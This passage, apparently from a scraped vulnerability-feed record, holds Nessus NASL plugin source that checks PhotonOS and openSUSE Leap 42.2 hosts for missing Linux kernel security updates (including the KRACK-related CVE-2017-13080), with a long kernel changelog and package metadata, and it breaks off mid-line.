script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9a12a31\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15951\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.9.60-1.ph2\",\n \"linux-api-headers-4.9.60-1.ph2\",\n \"linux-debuginfo-4.9.60-1.ph2\",\n \"linux-devel-4.9.60-1.ph2\",\n \"linux-docs-4.9.60-1.ph2\",\n \"linux-drivers-gpu-4.9.60-1.ph2\",\n \"linux-esx-4.9.60-1.ph2\",\n \"linux-esx-debuginfo-4.9.60-1.ph2\",\n \"linux-esx-devel-4.9.60-1.ph2\",\n \"linux-esx-docs-4.9.60-1.ph2\",\n \"linux-oprofile-4.9.60-1.ph2\",\n \"linux-secure-4.9.60-1.ph2\",\n \"linux-secure-debuginfo-4.9.60-1.ph2\",\n \"linux-secure-devel-4.9.60-1.ph2\",\n \"linux-secure-docs-4.9.60-1.ph2\",\n \"linux-sound-4.9.60-1.ph2\",\n \"linux-tools-4.9.60-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-05T11:13:18", "bulletinFamily": "scanner", "description": "The openSUSE Leap 42.2 kernel was updated to 4.4.92 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in\n the Linux kernel allowed local users to cause a denial\n of service (use-after-free) or possibly have unspecified\n other impact via crafted /dev/snd/seq ioctl calls,\n related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe following non-security bugs were fixed :\n\n - alsa: au88x0: avoid theoretical uninitialized access\n (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted\n buffer descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation\n failures (bnc#1012382).\n\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM\n (bnc#1012382).\n\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for\n msiof nodes (bnc#1012382).\n\n - arm: remove duplicate ", "modified": "2017-10-30T00:00:00", "id": "OPENSUSE-2017-1224.NASL", "href": "https://www.tenable.com/plugins/nessus/104246", "published": "2017-10-30T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-1224) (KRACK)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104246);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-13080\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1224) (KRACK)\");\n script_summary(english:\"Check for the openSUSE-2017-1224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.2 kernel was updated to 4.4.92 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1063667).\n\n - CVE-2017-15265: Race condition in the ALSA subsystem in\n the Linux kernel allowed local users to cause a denial\n of service (use-after-free) or possibly have unspecified\n other impact via crafted /dev/snd/seq ioctl calls,\n related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe following non-security bugs were fixed :\n\n - alsa: au88x0: avoid theoretical uninitialized access\n (bnc#1012382).\n\n - alsa: compress: Remove unused variable (bnc#1012382).\n\n - alsa: usb-audio: Check out-of-bounds access by corrupted\n buffer descriptor (bnc#1012382).\n\n - alsa: usx2y: Suppress kernel warning at page allocation\n failures (bnc#1012382).\n\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM\n (bnc#1012382).\n\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for\n msiof nodes (bnc#1012382).\n\n - arm: remove duplicate 'const' annotations'\n (bnc#1012382).\n\n - asoc: dapm: fix some pointer error handling\n (bnc#1012382).\n\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n\n - audit: log 32-bit socketcalls (bnc#1012382).\n\n - blacklist 0e7736c6b806 powerpc/powernv: Fix data type\n for @r in pnv_ioda_parse_m64_window()\n\n - blacklist.conf: not fitting cleanup patch\n\n - brcmfmac: setup passive scan if requested by user-space\n (bnc#1012382).\n\n - bridge: netlink: register netdevice before executing\n changelink (bnc#1012382).\n\n - ceph: avoid panic in create_session_open_msg() if\n utsname() returns NULL (bsc#1061451).\n\n - ceph: check negative offsets in ceph_llseek()\n (bsc#1061451).\n\n - driver core: platform: Do not read past the end of\n 'driver_override' buffer (bnc#1012382).\n\n - drivers: firmware: psci: drop duplicate const from\n psci_of_match (bnc#1012382).\n\n - drivers: hv: fcopy: restore correct transfer length\n (bnc#1012382).\n\n - drm/amdkfd: fix improper return value on error\n (bnc#1012382).\n\n - drm: bridge: add DT bindings for TI ths8135\n (bnc#1012382).\n\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define\n (bnc#1012382).\n\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n\n - ext4: do not allow encrypted operations without keys\n (bnc#1012382).\n\n - extcon: axp288: Use vbus-valid instead of -present to\n determine cable presence (bnc#1012382).\n\n - exynos-gsc: Do not swap cb/cr for semi planar formats\n (bnc#1012382).\n\n - fix whitespace according to upstream commit\n\n - fs/epoll: cache leftmost node (bsc#1056427).\n\n - ftrace: Fix kmemleak in unregister_ftrace_graph\n (bnc#1012382).\n\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next\n (bnc#1012382).\n\n - hid: i2c-hid: allocate hid buffers for real worst case\n (bnc#1012382).\n\n - hpsa: correct lun data caching bitmap definition\n (bsc#1028971).\n\n - hwmon: (gl520sm) Fix overflows and crash seen when\n writing into limit attributes (bnc#1012382).\n\n - i2c: meson: fix wrong variable usage in\n meson_i2c_put_data (bnc#1012382).\n\n - i40e: Initialize 64-bit statistics TX ring seqcount\n (bsc#969476 FATE#319648 bsc#969477 FATE#319816).\n\n - i40iw: Add missing memory barriers (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n\n - i40iw: Fix port number for query QP (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n\n - ib/core: Fix the validations of a multicast LID in\n attach or detach operations (bsc#1022595 FATE#322350).\n\n - ib/i40iw: Fix error code in i40iw_create_cq()\n (bsc#969476 FATE#319648 bsc#969477 FATE#319816).\n\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382).\n\n - ib/ipoib: Replace list_del of the neigh->list with\n list_del_init (bnc#1012382).\n\n - ib/ipoib: rtnl_unlock can not come after free_netdev\n (bnc#1012382).\n\n - ib/mlx5: Fix Raw Packet QP event handler assignment\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - ibmvnic: Set state UP (bsc#1062962).\n\n - ib/qib: fix false-postive maybe-uninitialized warning\n (bnc#1012382).\n\n - igb: re-assign hw address pointer on reset after PCI\n error (bnc#1012382).\n\n - iio: ad7793: Fix the serial interface reset\n (bnc#1012382).\n\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL\n register modifications (bnc#1012382).\n\n - iio: adc: hx711: Add DT binding for avia,hx711\n (bnc#1012382).\n\n - iio: adc: mcp320x: Fix oops on module unload\n (bnc#1012382).\n\n - iio: adc: mcp320x: Fix readout of negative voltages\n (bnc#1012382).\n\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the\n error handling path of 'twl4030_madc_probe()'\n (bnc#1012382).\n\n - iio: adc: twl4030: Fix an error handling path in\n 'twl4030_madc_probe()' (bnc#1012382).\n\n - iio: ad_sigma_delta: Implement a dedicated reset\n function (bnc#1012382).\n\n - iio: core: Return error for failed read_reg\n (bnc#1012382).\n\n - iommu/io-pgtable-arm: Check for leaf entry before\n dereferencing it (bnc#1012382).\n\n - iwlwifi: add workaround to disable wide channels in 5GHz\n (bnc#1012382).\n\n - ixgbe: Fix incorrect bitwise operations of PTP Rx\n timestamp flags (bsc#969474 FATE#319812 bsc#969475\n FATE#319814).\n\n - kABI: protect struct rm_data_op (kabi).\n\n - kABI: protect struct sdio_func (kabi).\n\n - libata: transport: Remove circular dependency at free\n time (bnc#1012382).\n\n - lsm: fix smack_inode_removexattr and xattr_getsecurity\n memleak (bnc#1012382).\n\n - md/raid10: submit bio directly to replacement disk\n (bnc#1012382).\n\n - mips: Ensure bss section ends on a long-aligned address\n (bnc#1012382).\n\n - mips: Fix minimum alignment requirement of IRQ stack\n (git-fixes).\n\n - mips: IRQ Stack: Unwind IRQ stack onto task stack\n (bnc#1012382).\n\n - mips: Lantiq: Fix another request_mem_region() return\n code check (bnc#1012382).\n\n - mips: ralink: Fix incorrect assignment on ralink_soc\n (bnc#1012382).\n\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms\n array (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - mm/backing-dev.c: fix an error handling path in\n 'cgwb_create()' (bnc#1063475).\n\n - mm,compaction: serialize waitqueue_active() checks (for\n real) (bsc#971975).\n\n - mmc: sdio: fix alignment issue in struct sdio_func\n (bnc#1012382).\n\n - mm: discard memblock data later (bnc#1063460).\n\n - mm/memblock.c: reversed logic in memblock_discard()\n (bnc#1063460).\n\n - mm: meminit: mark init_reserved_page as __meminit\n (bnc#1063509).\n\n - mm/memory_hotplug: change\n pfn_to_section_nr/section_nr_to_pfn macro to inline\n function (bnc#1063501).\n\n - mm/memory_hotplug: define\n find_(smallest|biggest)_section_pfn as unsigned long\n (bnc#1063520).\n\n - net: core: Prevent from dereferencing NULL pointer when\n releasing SKB (bnc#1012382).\n\n - netfilter: invoke synchronize_rcu after set the _hook_\n to NULL (bnc#1012382).\n\n - netfilter: nfnl_cthelper: fix incorrect\n helper->expect_class_max (bnc#1012382).\n\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter\n is not enabled (bsc#966191 FATE#320230 bsc#966186\n FATE#320228).\n\n - net/mlx5e: Fix wrong delay calculation for overflow\n check scheduling (bsc#966170 FATE#320225 bsc#966172\n FATE#320226).\n\n - net/mlx5e: Schedule overflow check work to mlx5e\n workqueue (bsc#966170 FATE#320225 bsc#966172\n FATE#320226).\n\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n\n - net/packet: check length in getsockopt() called with\n PACKET_HDRLEN (bnc#1012382).\n\n - nvme: protect against simultaneous shutdown invocations\n (FATE#319965 bnc#1012382 bsc#964944).\n\n - parisc: perf: Fix potential NULL pointer dereference\n (bnc#1012382).\n\n - partitions/efi: Fix integer overflow in GPT size\n calculation (bnc#1012382).\n\n - qed: Fix stack corruption on probe (bsc#966318\n FATE#320158 bsc#966316 FATE#320159).\n\n - rds: ib: add error handle (bnc#1012382).\n\n - rds: RDMA: Fix the composite message user notification\n (bnc#1012382).\n\n - README.BRANCH: Add Michal and Johannes as\n co-maintainers.\n\n - sched/cpuset/pm: Fix cpuset vs. suspend-resume bugs\n (bnc#1012382).\n\n - scsi: hpsa: add 'ctlr_num' sysfs attribute\n (bsc#1028971).\n\n - scsi: hpsa: bump driver version (bsc#1022600\n fate#321928).\n\n - scsi: hpsa: change driver version (bsc#1022600\n bsc#1028971 fate#321928).\n\n - scsi: hpsa: Check for null device pointers\n (bsc#1028971).\n\n - scsi: hpsa: Check for null devices in ioaccel\n (bsc#1028971).\n\n - scsi: hpsa: Check for vpd support before sending\n (bsc#1028971).\n\n - scsi: hpsa: cleanup reset handler (bsc#1022600\n fate#321928).\n\n - scsi: hpsa: correct call to hpsa_do_reset (bsc#1028971).\n\n - scsi: hpsa: correct logical resets (bsc#1028971).\n\n - scsi: hpsa: correct queue depth for externals\n (bsc#1022600 fate#321928).\n\n - scsi: hpsa: correct resets on retried commands\n (bsc#1022600 fate#321928).\n\n - scsi: hpsa: correct scsi 6byte lba calculation\n (bsc#1028971).\n\n - scsi: hpsa: Determine device external status earlier\n (bsc#1028971).\n\n - scsi: hpsa: do not get enclosure info for external\n devices (bsc#1022600 fate#321928).\n\n - scsi: hpsa: do not reset enclosures (bsc#1022600\n fate#321928).\n\n - scsi: hpsa: do not timeout reset operations (bsc#1022600\n bsc#1028971 fate#321928).\n\n - scsi: hpsa: fallback to use legacy REPORT PHYS command\n (bsc#1028971).\n\n - scsi: hpsa: fix volume offline state (bsc#1022600\n bsc#1028971 fate#321928).\n\n - scsi: hpsa: limit outstanding rescans (bsc#1022600\n bsc#1028971 fate#321928).\n\n - scsi: hpsa: Prevent sending bmic commands to externals\n (bsc#1028971).\n\n - scsi: hpsa: remove abort handler (bsc#1022600\n fate#321928).\n\n - scsi: hpsa: remove coalescing settings for ioaccel2\n (bsc#1028971).\n\n - scsi: hpsa: remove memory allocate failure message\n (bsc#1028971).\n\n - scsi: hpsa: Remove unneeded void pointer cast\n (bsc#1028971).\n\n - scsi: hpsa: rescan later if reset in progress\n (bsc#1022600 fate#321928).\n\n - scsi: hpsa: send ioaccel requests with 0 length down\n raid path (bsc#1022600 fate#321928).\n\n - scsi: hpsa: separate monitor events from rescan worker\n (bsc#1022600 fate#321928).\n\n - scsi: hpsa: update check for logical volume status\n (bsc#1022600 bsc#1028971 fate#321928).\n\n - scsi: hpsa: update identify physical device structure\n (bsc#1022600 fate#321928).\n\n - scsi: hpsa: update pci ids (bsc#1022600 bsc#1028971\n fate#321928).\n\n - scsi: hpsa: update reset handler (bsc#1022600\n fate#321928).\n\n - scsi: hpsa: use designated initializers (bsc#1028971).\n\n - scsi: hpsa: use %phN for short hex dumps (bsc#1028971).\n\n - scsi: libfc: fix a deadlock in fc_rport_work\n (bsc#1063695).\n\n - scsi: sd: Do not override max_sectors_kb sysfs setting\n (bsc#1025461).\n\n - scsi: sd: Remove LBPRZ dependency for discards\n (bsc#1060985). This patch is originally part of a larger\n series which can't be easily backported to SLE-12. For a\n reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n\n - scsi: sg: close race condition in\n sg_remove_sfp_usercontext() (bsc#1064206).\n\n - sh_eth: use correct name for ECMR_MPDE bit\n (bnc#1012382).\n\n - staging: iio: ad7192: Fix - use the dedicated reset\n function avoiding dma from stack (bnc#1012382).\n\n - stm class: Fix a use-after-free (bnc#1012382).\n\n - supported.conf: mark hid-multitouch as supported\n (FATE#323670)\n\n - team: call netdev_change_features out of team lock\n (bsc#1055567).\n\n - team: fix memory leaks (bnc#1012382).\n\n - tpm_tis: Do not fall back to a hardcoded address for\n TPM2 (bsc#1020645, fate#321435, fate#321507,\n fate#321600, bsc#1034048).\n\n - ttpci: address stringop overflow warning (bnc#1012382).\n\n - tty: goldfish: Fix a parameter of a call to free_irq\n (bnc#1012382).\n\n - usb: chipidea: vbus event may exist before starting\n gadget (bnc#1012382).\n\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n\n - usb: dummy-hcd: fix connection failures (wrong speed)\n (bnc#1012382).\n\n - usb: dummy-hcd: Fix erroneous synchronization change\n (bnc#1012382).\n\n - usb: dummy-hcd: fix infinite-loop resubmission bug\n (bnc#1012382).\n\n - usb: fix out-of-bounds in usb_set_configuration\n (bnc#1012382).\n\n - usb: gadgetfs: fix copy_to_user while holding spinlock\n (bnc#1012382).\n\n - usb: gadgetfs: Fix crash caused by inadequate\n synchronization (bnc#1012382).\n\n - usb: gadget: inode.c: fix unbalanced spin_lock in\n ep0_write (bnc#1012382).\n\n - usb: gadget: mass_storage: set msg_registered after msg\n registered (bnc#1012382).\n\n - usb: gadget: udc: atmel: set vbus irqflags explicitly\n (bnc#1012382).\n\n - usb: g_mass_storage: Fix deadlock when driver is unbound\n (bnc#1012382).\n\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n\n - usb: pci-quirks.c: Corrected timeout values used in\n handshake (bnc#1012382).\n\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n\n - usb: renesas_usbhs: fix the BCLR setting condition for\n non-DCP pipe (bnc#1012382).\n\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX\n direction (bnc#1012382).\n\n - usb: serial: mos7720: fix control-message error handling\n (bnc#1012382).\n\n - usb: serial: mos7840: fix control-message error handling\n (bnc#1012382).\n\n - usb-storage: unusual_devs entry to fix write-access\n regression for Seagate external drives (bnc#1012382).\n\n - usb: uas: fix bug in handling of alternate settings\n (bnc#1012382).\n\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n\n - uwb: properly check kthread_run return value\n (bnc#1012382).\n\n - xfs: handle error if xfs_btree_get_bufs fails\n (bsc#1059863).\n\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n\n - xhci: fix finding correct bus_state structure for USB\n 3.1 hosts (bnc#1012382).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1022600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1025461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1028971\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1056427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1059863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1060985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1061451\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1062520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1062962\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063460\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1063695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966316\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969474\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", 